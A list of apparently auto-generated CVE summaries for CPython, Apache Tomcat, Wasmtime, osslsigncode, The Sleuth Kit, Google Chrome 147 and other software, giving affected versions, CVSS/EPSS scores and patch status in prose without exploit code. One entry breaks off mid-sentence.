CPython's base64.b64decode() function prematurely stops processing after encountering the first padded quad, allowing malformed base64 data to be accepted that may be interpreted differently by other implementations. This affects CPython 3.13.x before 3.13.13, 3.14.x before 3.14.4, and 3.15.0a1 before 3.15.0a8, with authenticated remote attackers on high-complexity networks potentially inducing information disclosure (CVSS 6.0, EPSS risk level moderate). Upstream fixes are available in tagged commits; users should upgrade to patched versions or enable validate=True parameter for stricter base64 validation.
Heap buffer overflow in HDF5 library versions 1.14.1-2 and earlier allows local attackers to trigger a write-based overflow in the H5T__ref_mem_setnull method by crafting malicious HDF5 files, leading to denial-of-service and potential remote code execution depending on heap exploitation complexity. Attack requires local file access and user interaction to parse a malicious file. No public exploit code identified at time of analysis.
Denial of service in systemd 260 allows local unprivileged users to crash the systemd daemon by triggering an assert via IPC API calls containing arrays or maps with null elements. The vulnerability affects systemd versions 260 through 260, with no public exploit code identified at time of analysis. EPSS score of 6.2 reflects moderate real-world risk due to local-only attack vector and non-privileged requirements.
Escape-to-host vulnerability in systemd nspawn (versions 233-259) allows local privileged users to break container isolation via a crafted optional config file, enabling arbitrary code execution on the host system. CVSS 6.4 reflects high integrity and confidentiality impact but requires high privilege and difficult attack conditions. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stack-based buffer overflow in NASM's disasm() function enables unauthenticated denial-of-service when processing malicious assembly input. Attacker-controlled disassembly formatting triggers out-of-bounds write when string length exceeds buffer capacity, causing application crash. Affects NASM assembler version 3.02rc5. Publicly available exploit code exists. CVSS 7.5 (High) reflects network-accessible attack vector requiring no privileges or user interaction, with availability impact only.
Integer overflow in the Linux kernel's USB gadget mass storage driver (f_mass_storage) allows a malicious USB host to corrupt kernel memory or trigger out-of-bounds accesses on any Linux system acting as a USB storage gadget. The flaw affects kernel versions tracing back to Linux 3.3 (commit 144974e7f9e32b53b02f6c8632be45d8f43d6ab5), with vendor-released patches now available across multiple stable branches. No public exploit has been identified at time of analysis, and EPSS exploitation probability stands at a very low 0.02%, consistent with the physical USB access prerequisite.
Helm versions 3.20.1 and earlier, and 4.1.3 and earlier, allow local attackers with user interaction to write Chart contents to arbitrary directories via path traversal in the helm pull --untar command. A specially crafted Chart will bypass the expected subdirectory naming convention and extract files to the current working directory or a user-specified destination, potentially overwriting existing files. Vendor-released patches are available in versions 3.20.2 and 4.1.4.
CLIENT_CERT authentication bypass in Apache Tomcat allows unauthenticated remote attackers to bypass certificate-based authentication when soft fail is disabled and Foreign Function Memory (FFM) is enabled, affecting Tomcat 9.0.92-9.0.116, 10.1.22-10.1.53, and 11.0.0-M14-11.0.20. The vulnerability has a CVSS score of 6.5 with high confidentiality impact and partial integrity impact; however, the EPSS score of 0.04% (11th percentile) indicates very low real-world exploitation probability, and no public exploit code or confirmed active exploitation has been identified.
Apache Tomcat's cloud membership clustering component logs Kubernetes bearer tokens in plaintext, enabling unauthenticated remote attackers to extract authentication credentials from log files. Affects Tomcat 9.0.13-9.0.116, 10.1.0-M1-10.1.53, and 11.0.0-M1-11.0.20. CVSS 7.5 (High) reflects confidentiality impact; no public exploit identified at time of analysis. Exploitation requires network access to log files or log aggregation systems, potentially enabling privilege escalation within Kubernetes clusters.
Information disclosure in Apache Tomcat's JsonAccessLogValve allows unauthenticated remote attackers to retrieve sensitive data due to improper output encoding. Affects Tomcat versions 11.0.0-M1 through 11.0.20, 10.1.0-M1 through 10.1.53, and 9.0.40 through 9.0.116. The vulnerability enables high-impact confidentiality breaches through network-accessible attack vectors with low complexity and no user interaction required. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.02%).
Improper input validation in Apache Tomcat allows remote unauthenticated attackers to obtain sensitive information via an incomplete fix of the prior CVE-2025-66614 vulnerability. Affected versions include Tomcat 11.0.15-11.0.19, 10.1.50-10.1.52, and 9.0.113-9.0.115. The CVSS score of 5.3 reflects low confidentiality impact with no integrity or availability impact, and the 0.04% EPSS score indicates minimal real-world exploitation probability at time of analysis with no public exploit code or KEV status confirmed.
Authentication bypass in Apache Tomcat 9.x through 11.x and Tomcat Native 1.1.23-2.0.13 allows unauthenticated remote attackers to bypass CLIENT_CERT authentication when soft-fail is disabled, achieving unauthorized access to confidentiality- and integrity-sensitive resources. Exploitation requires no user interaction or privileges (CVSS:3.1 PR:N/UI:N). The flaw affects CLIENT_CERT authentication logic, permitting access under conditions where authentication should fail. No public exploit identified at time of analysis; low observed exploitation activity (EPSS 0.04%).
Cipher preference order enforcement failure in Apache Tomcat 9.0.114-9.0.115, 10.1.51-10.1.52, and 11.0.16-11.0.18 allows unauthenticated remote attackers to force selection of weaker cryptographic ciphers during TLS negotiation, enabling potential decryption of confidential data transmitted over HTTPS connections. The vulnerability stems from improper preservation of administrator-configured cipher suite priority, potentially exposing sensitive session data, credentials, or application content. No public exploit identified at time of analysis. CVSS 7.5 (High) reflects network-accessible confidentiality impact requiring no privileges.
Open redirect vulnerability in Apache Tomcat's LoadBalancerDrainingValve allows unauthenticated remote attackers to redirect users to untrusted sites via crafted URLs. Affects Tomcat 11.0.0-M1 through 11.0.18, 10.1.0-M1 through 10.1.52, 9.0.0.M23 through 9.0.115, and 8.5.30 through 8.5.100. The vulnerability requires user interaction (clicking a malicious link) and has low real-world exploitation probability (EPSS 0.01%), with no public exploit code or confirmed active exploitation identified at the time of analysis.
HTTP request smuggling in Apache Tomcat 7.x through 11.x permits unauthenticated remote attackers to manipulate request routing and bypass security controls via malformed chunk extension processing. Exploitation enables header injection, cache poisoning, and request routing manipulation without code execution. Affects Tomcat 7.0.0-7.0.109, 8.5.0-8.5.100, 9.0.0.M1-9.0.115, 10.1.0-M1-10.1.52, and 11.0.0-M1-11.0.18. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.02%).
Path traversal in flatpak-builder 1.4.5 through 1.4.7 enables arbitrary host file exfiltration through license-files manifest exploitation. Attacker-crafted manifest with symlink manipulation bypasses g_file_get_relative_path() and g_file_query_file_type() validation, allowing reads outside source directory. Successful exploitation requires user interaction (processing malicious manifest) but grants unauthenticated remote attackers high confidentiality impact with no authentication required. Publicly available exploit code exists. CVSS 7.1 reflects network vector with user participation prerequisite.
Wasmtime prior to versions 24.0.7, 36.0.7, 42.0.2, and 43.0.1 allows authenticated remote attackers to corrupt memory by providing malicious realloc return values during string transcoding between WebAssembly components, enabling writes to arbitrary memory locations up to 4GiB away from linear memory base. On default configurations with 4GiB virtual memory reservation and guard pages, exploitation typically triggers process abort via unmapped memory access; however, configurations with reduced memory reservation and disabled guard pages risk corruption of host data structures or other guest linear memories.
Wasmtime versions 25.0.0 through 36.0.6, 42.0.0-42.0.1, and 43.0.0 contain a compiler type-checking bug in the Winch backend where the table.grow operator returns incorrectly typed 64-bit values instead of 32-bit values for 32-bit tables, enabling read/write access to 16 bytes of host memory preceding linear memory and resulting in denial of service when Wasmtime detects the unauthorized access. The vulnerability requires explicit selection of the non-default Winch compiler backend and either disabled guard pages or modified memory layout to achieve information disclosure; default Wasmtime configurations using the Cranelift compiler and standard guard page placement are unaffected. No public exploit code or active exploitation has been identified, though the attack vector is remote and requires low-privilege authenticated access.
Memory sandbox escape in Wasmtime's Winch compiler (versions 25.0.0 to before 36.0.7, 42.0.2, 43.0.1) enables authenticated WebAssembly guests to access arbitrary host process memory outside linear-memory boundaries. Exploitation requires non-default Winch backend activation via -Ccompiler=winch flag. Attackers can read up to 32KiB before memory start or ~4GiB after, with theoretical potential for unlimited in-process memory access due to improper 32-bit offset handling in 64-bit registers. Consequences include host process crashes (DoS), sensitive data exfiltration, or remote code execution through memory writes. Affects aarch64 (confirmed PoC) and x86-64 (theoretical). Publicly available exploit code exists.
Out-of-bounds read in osslsigncode versions 2.12 and earlier allows local attackers to crash the application via crafted PE files with malicious section headers during page-hash computation. The vulnerability exists in the pe_page_hash_calc() function, which fails to validate that section headers' PointerToRawData and SizeOfRawData values reference valid file regions. An attacker can trigger the flaw by providing a malicious PE file for signing with page hashing enabled (-ph flag) or by providing an already-signed malicious PE file for verification, where verification does not require the -ph flag. CVSS 5.5 with high availability impact; no public exploit identified at time of analysis.
Osslsigncode 2.12 and earlier contains an integer underflow in PE page-hash computation that allows local attackers to trigger an out-of-bounds heap read and crash the process via a specially crafted PE file with SizeOfHeaders larger than SectionAlignment. The vulnerability is triggered either when signing a malicious PE file with page hashing enabled (-ph flag) or when verifying an already-signed PE file containing page hashes, making verification particularly dangerous since no special flags are required. This is a denial-of-service vulnerability with no public exploit code identified at time of analysis, though the root cause (missing validation in integer subtraction) is straightforward to exploit.
Stack buffer overflow in osslsigncode <2.12 allows local attackers to execute arbitrary code during signature verification. The vulnerability affects PE, MSI, CAB, and script file verification handlers that copy digest values from SpcIndirectDataContent structures into fixed 64-byte stack buffers without length validation. Attackers craft malicious signed files with oversized digest fields triggering memcpy overflow when users verify files via osslsigncode verify command, corrupting stack state and enabling code execution with high confidentiality, integrity, and availability impact.
rrweb-snapshot before v2.0.0-alpha.18 contains a reflected cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript or HTML in a victim's browser context through a crafted payload. The vulnerability requires user interaction (clicking a malicious link) and affects client-side snapshot capture functionality. Publicly available exploit code exists according to CISA SSVC assessment, though active exploitation has not been confirmed at time of analysis.
Out-of-bounds read in The Sleuth Kit through 4.14.0 allows local attackers with user interaction to disclose sensitive information via a crafted ISO9660 image, exploiting the parse_susp() function's failure to validate field lengths before copying SUSP extension data into stack buffers. The vulnerability can also trigger infinite parsing loops with malformed zero-length SUSP entries. Patch available from upstream repository.
Out-of-bounds read in Sleuth Kit through version 4.14.0 allows local attackers to disclose heap memory or crash the application via a malicious APFS disk image with crafted length fields in the keybag parser. The vulnerability requires user interaction to process the malicious image but affects all Sleuth Kit tools that parse APFS volumes, with a public fix available on GitHub.
Path traversal in The Sleuth Kit (tsk_recover) through version 4.14.0 allows local attackers to write files outside intended recovery directories via malicious filesystem images. Crafted filenames with ../ sequences in processed disk images can overwrite arbitrary files, enabling potential code execution through shell configuration or cron file manipulation. Exploitation requires user interaction (processing attacker-supplied filesystem image). No public exploit identified at time of analysis.
Google Chrome prior to version 147.0.7727.55 contains an information disclosure vulnerability in the Navigation component that allows a remote attacker with a compromised renderer process to leak cross-origin data via a crafted HTML page. The vulnerability requires user interaction and only affects confidentiality (CVSS 4.3), with an extremely low EPSS score of 0.03% indicating minimal real-world exploitation probability despite the unauthenticated attack vector.
Out-of-bounds memory read in Google Chrome's media subsystem (versions prior to 147.0.7727.55) enables remote attackers to disclose sensitive information and trigger denial-of-service conditions via malicious video files. Exploitation requires user interaction (opening/playing crafted video content). Attack vector is network-based with low complexity and no authentication required. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.03%, 10th percentile).
Omnibox spoofing in Google Chrome on Android prior to version 147.0.7727.55 allows remote attackers to deceive users by displaying falsified URL bar contents through a crafted HTML page, enabling phishing and social engineering attacks without requiring user interaction beyond visiting a malicious site. Despite a low CVSS score of 4.3 and minimal EPSS exploitation probability (0.03%), the vulnerability has real-world impact because attackers can trick users into believing they are on legitimate domains while actually on attacker-controlled pages.
Domain spoofing via incorrect security UI in Google Chrome on Windows prior to version 147.0.7727.55 allows unauthenticated remote attackers to deceive users through crafted HTML pages that exploit flawed permission display mechanisms. The attack requires user interaction (clicking or viewing a malicious page) but carries moderate real-world risk due to low EPSS exploitation probability (0.03%, 7th percentile) despite the high CVSS impact score, suggesting the vulnerability requires specific user actions or conditions to successfully exploit.
Heap corruption via malicious Chrome extension exploits use-after-free flaw in V8 JavaScript engine, affecting Chrome versions prior to 147.0.7727.55. Attacker must convince user to install a crafted extension to achieve potential remote code execution with high confidentiality, integrity, and availability impact. EPSS score of 0.01% (1st percentile) indicates minimal observed exploitation activity; no CISA KEV listing or public exploit code identified at time of analysis. Despite high CVSS 8.8
Bypass of iframe sandbox navigation restrictions in Google Chrome prior to version 147.0.7727.55 allows remote attackers to circumvent security boundaries via a crafted HTML page combined with specific user UI gestures. The vulnerability affects the IFrameSandbox security mechanism, which is designed to prevent iframes from navigating the top-level window; successful exploitation requires user interaction but results in direct integrity impact through unauthorized navigation. This is a low-severity issue with minimal exploitation probability (EPSS 0.02%, percentile 3%) and no confirmed active exploitation.
Media stream metadata corruption in Google Chrome for Android prior to 147.0.7727.55 enables remote attackers who have already compromised the renderer process to corrupt media stream metadata via a race condition (CWE-362) in the Media component. Despite a critical CVSS 9.8 score with network-accessible attack vector, real-world exploitation requires pre-compromise of the renderer, and EPSS probability is very low (0.03%, 9th percentile). Vendor patch released in Chrome 147.0.7727.55. No public exploit or active exploitation (KEV) identified at time of analysis. Chromium rates this Low severity, contrasting sharply with the theoretical CVSS rating.
Insufficient policy enforcement in Google Chrome's DevTools allows unauthenticated attackers who convince users to install a malicious extension to bypass enterprise host restrictions and modify cookies, affecting Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction to install the malicious extension but grants attackers the ability to circumvent security policies protecting sensitive cookie data. With an EPSS score of 0.01% and Chromium severity rated as Low, real-world exploitation is unlikely despite the moderate CVSS score of 6.5.
Google Chrome versions prior to 147.0.7727.55 contain a policy bypass vulnerability in the Downloads feature that allows remote attackers to circumvent multi-download protections through a crafted HTML page. The vulnerability requires user interaction (clicking or accepting a download), affects integrity only (no code execution or availability impact), and carries a low Chromium severity rating. EPSS exploitation probability is minimal at 0.02% (3rd percentile), indicating this is primarily a user-experience or policy-enforcement issue rather than a critical security risk.
Insufficient policy enforcement in History Navigation in Google Chrome prior to version 147.0.7727.55 enables cross-site scripting (UXSS) attacks when users perform specific UI gestures on attacker-controlled pages, allowing injection of arbitrary scripts or HTML with potential impact on user data confidentiality and integrity. The vulnerability affects all Chrome versions before 147.0.7727.55 across all platforms, requires user interaction with specific UI gestures but no authentication, and carries a low Chromium severity rating despite a moderate CVSS score. No public exploit code has been identified at the time of analysis, though the vulnerability was tracked via Chromium issue tracking.
UI spoofing in Google Chrome on iOS prior to version 147.0.7727.55 allows remote attackers to deceive users through malicious HTML pages that manipulate the Omnibox security indicator, enabling phishing or credential theft without code execution. The vulnerability requires user interaction and has low confidentiality impact, reflected in both the CVSS score of 4.3 and minimal EPSS score of 0.03%, indicating limited real-world exploitation likelihood despite public discoverability.
UI spoofing in Google Chrome's Downloads interface prior to version 147.0.7727.55 allows remote attackers to deceive users into performing unintended actions via crafted HTML pages exploiting incorrect security UI rendering. The vulnerability requires user interaction with specific UI gestures on a malicious webpage, resulting in limited integrity impact through visual deception rather than code execution or data exfiltration. Although marked as low severity by Chromium and carrying minimal exploitation probability (EPSS 0.03%), the attack surface is broad given Chrome's prevalence as a target for social engineering.
Google Chrome prior to version 147.0.7727.55 contains a sandbox bypass vulnerability in the Audio subsystem that allows remote attackers to circumvent download policy restrictions by convincing users to perform specific UI gestures on a crafted HTML page. The vulnerability has low practical exploitability (EPSS 0.02%) and requires active user interaction, limiting real-world risk despite cross-origin scope impact.
Google Chrome on iOS prior to version 147.0.7727.55 contains an Omnibox (URL bar) spoofing vulnerability that allows remote attackers to display misleading domain names to users through crafted domains, potentially enabling phishing attacks. The vulnerability requires user interaction (clicking a link) and affects iOS-specific browser UI rendering. While assigned a low Chromium security severity and rated 5.4 CVSS, the practical exploitation probability remains minimal (0.03% EPSS) due to the high user-interaction requirement and limited information-disclosure impact.
Google Chrome prior to version 147.0.7727.55 contains an inappropriate PDF implementation that allows remote attackers to bypass navigation restrictions via a crafted HTML page. The vulnerability requires user interaction to trigger and offers low real-world risk, with an EPSS score of 0.02% (3rd percentile) indicating minimal exploitation probability despite its network-accessible attack vector. A vendor-released patch is available.
Remote code execution in Google Chrome prior to 147.0.7727.55 exploits a race condition in the V8 JavaScript engine to corrupt heap memory via crafted HTML, requiring user interaction. The vulnerability affects all Chrome versions below 147.0.7727.55 across all platforms via the CPE cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*. No public exploit code or active exploitation has been confirmed at time of analysis, though the Chromium security team rated it medium severity; EPSS scoring at 0.03% (9th percentile) indicates low real-world exploitation probability despite the high CVSS score of 6.8.
Insufficient policy enforcement in PWA installation within Google Chrome prior to version 147.0.7727.55 allows a local attacker with renderer process compromise to install a Progressive Web App without user consent via a crafted HTML page. This vulnerability requires prior compromise of the renderer process and user interaction, resulting in high integrity and availability impact. The issue carries a low real-world exploitation probability (EPSS 0.03%), reflecting the significant prerequisites needed to trigger the vulnerability.
UI spoofing in Google Chrome prior to version 147.0.7727.55 allows remote attackers with a compromised renderer process to deceive users through crafted HTML pages. The vulnerability requires prior renderer compromise, limiting real-world exploitation to scenarios where an attacker has already achieved code execution within the browser's sandboxed rendering context. No active exploitation confirmed; EPSS score of 0.03% indicates minimal exploitation probability.
Cryptographic weakness in PDFium allows unauthenticated remote attackers to decrypt and read sensitive information from password-protected PDFs through brute-force attacks when users view malicious or compromised PDF files in Google Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction (opening a PDF) but combines weak cryptographic design (CWE-326) with low attack complexity, making it feasible for attackers to extract confidential content from encrypted documents. EPSS score of 0.01% indicates minimal real-world exploitation likelihood despite Chromium's medium severity classification.
Information disclosure in Google Chrome prior to 147.0.7727.55 allows remote attackers to read sensitive process memory through the WebCodecs API via a crafted HTML page. Exploitation requires user interaction (UI:R) to visit a malicious webpage but grants high-confidence memory access. The vulnerability has low real-world exploitation probability (EPSS 0.03%) despite satisfying network-accessible conditions, likely due to unreliable memory content extraction and WebCodecs' limited practical attack surface in typical user workflows.
Google Chrome on Windows prior to version 147.0.7727.55 fails to properly validate user input in the Downloads functionality, allowing remote attackers to bypass download restrictions through a crafted HTML page. The vulnerability requires user interaction (clicking a link or visiting a malicious page) but has low real-world impact-it enables integrity bypass only, not code execution or confidentiality breaches. No public exploit code or active exploitation has been identified; the low EPSS score (0.02%) reflects minimal practical risk despite the network attack vector.